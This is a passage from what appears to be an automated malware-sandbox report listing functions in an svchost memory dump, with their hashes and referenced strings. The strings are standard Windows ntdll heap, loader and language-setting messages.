                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$IDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-1535383429
                                                                              • Opcode ID: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                                                              • Instruction ID: 9880351710fdf7893f13d613f82f7bd5fea31d2acf8dd7b7dfcf0e71f185574a
                                                                              • Opcode Fuzzy Hash: 4e2e2701dfcdec1fe0fc97b220e635e1904667e824efdd1385135cf6e0371e57
                                                                              • Instruction Fuzzy Hash: A581BCB5E00758BFDB20CF98C940BAEBBB9FB49704F14415AF518BB241D379A940CB64
                                                                              Function 03A60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                              • API String ID: 0-360209818
                                                                              • Opcode ID: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                                                              • Instruction ID: 552dca624339f647f9c008a499f4cbc42bbf98bde4bc394d710aa196421673fe
                                                                              • Opcode Fuzzy Hash: 2a55848a644e8b1765eb0b3a81bd29310f327a5948d1084e19f9ea191c34dee5
                                                                              • Instruction Fuzzy Hash: 77629EB6E006299FDB24CF18C8407A9B7B6EF95320F5982DFD449AB280D7365AD1CF50
                                                                              Function 03AE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                              • API String ID: 0-3591852110
                                                                              • Opcode ID: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                                                              • Instruction ID: 354955615d5b02836554ef9c6867f6872e4ee4c1aa768de67680e1769748330e
                                                                              • Opcode Fuzzy Hash: cdabc38ef213a8776de989863a82d1bde7423cd39bd6c025b790f3bec706a113
                                                                              • Instruction Fuzzy Hash: 6712AC74604662EFD725DF29C441BBABBF5FF0A714F08845EE4968B681D738E880CB60
                                                                              Function 03A4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-3197712848
                                                                              • Opcode ID: bdb621e8633e23c94a346d1efd3f11e4e6df76233c79242e06e582ccfafd1fbb
                                                                              • Instruction ID: 2c5fe55d5829b2facc561aa9e9db98a35adbad48e25e97794b1df0aeab541349
                                                                              • Opcode Fuzzy Hash: bdb621e8633e23c94a346d1efd3f11e4e6df76233c79242e06e582ccfafd1fbb
                                                                              • Instruction Fuzzy Hash: 6F12F271A083419FD724DF28C540BAAB7E8BFC5708F084A5FF8999B291E774D944CB62
                                                                              Function 03A2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                              • API String ID: 0-3532704233
                                                                              • Opcode ID: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                                                              • Instruction ID: 727d4895858d08c81bd493feaf36f0f3778aa07cf581a5b26443c63f147fa37d
                                                                              • Opcode Fuzzy Hash: 855b1fd951376812160fa4afca1e500877ed3f72948186df39c822ea1cae5d8a
                                                                              • Instruction Fuzzy Hash: E7B1AD729083619FC711EF28C980B6BBBE8BB88754F05492FF899DB341D774D9448B92
                                                                              Function 03AE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                              • API String ID: 0-1357697941
                                                                              • Opcode ID: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                                                              • Instruction ID: eb56436a0fbab5d3218fa807db58635396c5740f78a8e0eddcfe9a1b254c8353
                                                                              • Opcode Fuzzy Hash: 3c979374273fbcd393c890077c69f19fd506eab7810244c285ca6598d2182311
                                                                              • Instruction Fuzzy Hash: C8F10235A04695EFCB25DF6AC480BAAFBF5FF09704F08805FE4969B282C774A945CB50
                                                                              Function 03AC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                              • API String ID: 0-3063724069
                                                                              • Opcode ID: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                                                              • Instruction ID: 01e6c9f6e19bbd619502a61e8576617ae89d1b05af0218fea09a585f921164e4
                                                                              • Opcode Fuzzy Hash: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                                                              • Instruction Fuzzy Hash: 89D1D572814395AFD721DB64C980BAFB7ECAF84714F04492FFA949B290E774C948C792
                                                                              Function 03AE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              • Opcode ID: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                                                              • Instruction ID: 9e6f718e18ef580b00d92a16e974ea74100a23be4c80770890ca8b7f1d77a26f
                                                                              • Opcode Fuzzy Hash: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                                                              • Instruction Fuzzy Hash: 1ED1CC35500685EFCB26EF6AC540AAEFBF1FF5A704F08814AE4559B762C7B89941CB20
                                                                              Function 03A2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 03A2D196
                                                                              • @, xrefs: 03A2D313
                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03A2D146
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03A2D2C3
                                                                              • @, xrefs: 03A2D2AF
                                                                              • @, xrefs: 03A2D0FD
                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03A2D262
                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03A2D0CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                              • API String ID: 0-1356375266
                                                                              • Opcode ID: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                                                              • Instruction ID: af6a3e45794e8b79c273eaf285537dba7fd3ca2d260ec09f6c71290b060196fe
                                                                              • Opcode Fuzzy Hash: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                                                              • Instruction Fuzzy Hash: 46A16A719083559FD721DF28C984B5BBBE8BB84715F004D2FF9A89A241E774D908CF92
                                                                              Function 03A49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\sxsisol.cpp, xrefs: 03A97713, 03A978A4
                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03A97709
                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03A976EE
                                                                              • Internal error check failed, xrefs: 03A97718, 03A978A9
                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 03A976DD
                                                                              • @, xrefs: 03A49EE7
                                                                              • Status != STATUS_NOT_FOUND, xrefs: 03A9789A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                              • API String ID: 0-761764676
                                                                              • Opcode ID: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                                                              • Instruction ID: 8bb8fa584887a8244383dd2dc6b3bf1e58374753a0c2d42032729b1f74172e33
                                                                              • Opcode Fuzzy Hash: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                                                              • Instruction Fuzzy Hash: BC127E74A002259FEF24CF58C881AAEB7F4FF89714F1884ABE845EB351E7359851CB64
                                                                              Function 03A3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                              • API String ID: 0-1109411897
                                                                              • Opcode ID: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                                                              • Instruction ID: 4f9bc63339380d25002105fc4fc8d784829f6e2765a09016fd8d8e1ed9b2046a
                                                                              • Opcode Fuzzy Hash: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                                                              • Instruction Fuzzy Hash: 6FA22A75E056298FDF64DF19CD88BA9B7B5AF4A304F1442EBE809A7250DB349E81CF40
                                                                              Function 03A2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-523794902
                                                                              • Opcode ID: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                              • Instruction ID: d7b6a3aed338b33dc7b3751e45d7c2ed532e8014a0644a1eecbbd35f2054a1e6
                                                                              • Opcode Fuzzy Hash: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                              • Instruction Fuzzy Hash: D242CC75608391DFC715EF28C984A2ABBF5FF89604F084A6FE8968B391D734D841CB52
                                                                              Function 03A3ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                              • API String ID: 0-4098886588
                                                                              • Opcode ID: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                                                              • Instruction ID: 42a0e699015464ab06b8260121f379c540bda2dfad14169db5dd8275e8af3a19
                                                                              • Opcode Fuzzy Hash: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                                                              • Instruction Fuzzy Hash: D032B175E04269CFEF25CB14C894BEEB7BAAF46340F1841EBE449A7290D7719E818F50
                                                                              Function 03A4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-122214566
                                                                              • Opcode ID: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                              • Instruction ID: 7495ef8efd58544266c5bc43d8eb5401155a8a98af24a1ddc3ce7af080772324
                                                                              • Opcode Fuzzy Hash: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                              • Instruction Fuzzy Hash: F6C12B35A00215ABDF24CB69C880BBEB7B9AFD5310F18416FE845AF791E7B4D944C3A1
                                                                              Function 03A663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              • Opcode ID: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                              • Instruction ID: 85e0079dcac2be84fcc564ce788137faf3e53201d336056493d273d4c4c2c2fd
                                                                              • Opcode Fuzzy Hash: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                              • Instruction Fuzzy Hash: C6915836A00B149FDB34EF19DA48BAEB7B4FB55B18F08066FE8146B791D7B49801C790
                                                                              Function 03A6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03A6C6C3
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 03AA81E5
                                                                              • LdrpInitializeImportRedirection, xrefs: 03AA8177, 03AA81EB
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03AA8181, 03AA81F5
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 03AA8170
                                                                              • LdrpInitializeProcess, xrefs: 03A6C6C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              • Opcode ID: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                              • Instruction ID: 680eb332a7dee1985c71fd4fa187afdd8fdb8fa68a86f553cd3659e7cfe6deaa
                                                                              • Opcode Fuzzy Hash: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                              • Instruction Fuzzy Hash: 8331F77A644701AFC224EF2CDE45E2AB7A4EF84B24F04095AF8855B391D724EC04C7A2
                                                                              Function 03AB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                              • API String ID: 0-3127649145
                                                                              • Opcode ID: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                              • Instruction ID: 3206126e9fc6a719954f92e822b291ea42a7303bf0b96b2a9f26db4c3c63b0c3
                                                                              • Opcode Fuzzy Hash: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                              • Instruction Fuzzy Hash: AE325675A007199BDB60DF25CD88BDAB7F8FF48300F1046EAE509AB251DB70AA84CF50
                                                                              Function 03A49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                              • API String ID: 0-3393094623
                                                                              • Opcode ID: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                              • Instruction ID: f9b7b65b0dadf3073d1539f0a459caae53b5e913938f7574ea912c36683f73f8
                                                                              • Opcode Fuzzy Hash: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                              • Instruction Fuzzy Hash: 0A0257719083418FD720CF64C184BABBBE5BFC9704F48892FE9999B250E770D855CBA2
                                                                              Function 03A551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 03A55247
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 03A55352
                                                                              • Kernel-MUI-Language-SKU, xrefs: 03A5542B
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 03A5527B
                                                                              • WindowsExcludedProcs, xrefs: 03A5522A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              • Opcode ID: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                              • Instruction ID: 8167ae1fbec74c7da047b3ce5bdb098d24b411ada9967fa97366f6c87b0d94de
                                                                              • Opcode Fuzzy Hash: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                              • Instruction Fuzzy Hash: 4AF13B76D00218EFCF15DF98D984AAEBBF9FF49650F15405BE902AB250D7749E01CBA0
                                                                              Function 03AB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                              • API String ID: 0-2518169356
                                                                              • Opcode ID: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                              • Instruction ID: 507e0aa0a03d4a5a1c344dde915725ba08941310cd5429f481a40428b6380a5b
                                                                              • Opcode Fuzzy Hash: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                              • Instruction Fuzzy Hash: 6991BF76D006199FCB20CFA9C881AFEB7B8EF4A710F59416AE811EB352D735D901CB90
                                                                              Function 03A5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1975516107
                                                                              • Opcode ID: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                              • Instruction ID: 29bacc90396f13a2dd5c2222613d488ca9e0229281b992e807e20ee22a74675a
                                                                              • Opcode Fuzzy Hash: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                              • Instruction Fuzzy Hash: 6A51EE75A00345DFDB24EFA8C68479DFBB1BF49318F28425BE8056B6A5D774A881CB80
                                                                              Function 03A276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                              • API String ID: 0-3061284088
                                                                              • Opcode ID: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                              • Instruction ID: 7ec83e9d1a2cd6e4eb0ffcfb69d5360722ebd41f449ce80cfa2d314a7c9a3658
                                                                              • Opcode Fuzzy Hash: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                              • Instruction Fuzzy Hash: 8A01D876148660EFD22AF71DE519F96BBE4EB42B70F18405BE0104BAA2CBA59C84D570
                                                                              Function 03A470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                              • Instruction ID: 5c720f475052159e6a3f4be9f1f10e72eb7c28b4cfc0f7f7fac978905813a9a4
                                                                              • Opcode Fuzzy Hash: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                              • Instruction Fuzzy Hash: 69139D70A00655DFDB25CF68C4807A9FBF5BF89304F1881AED859AB381D73AA945CF90
                                                                              Function 03A41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
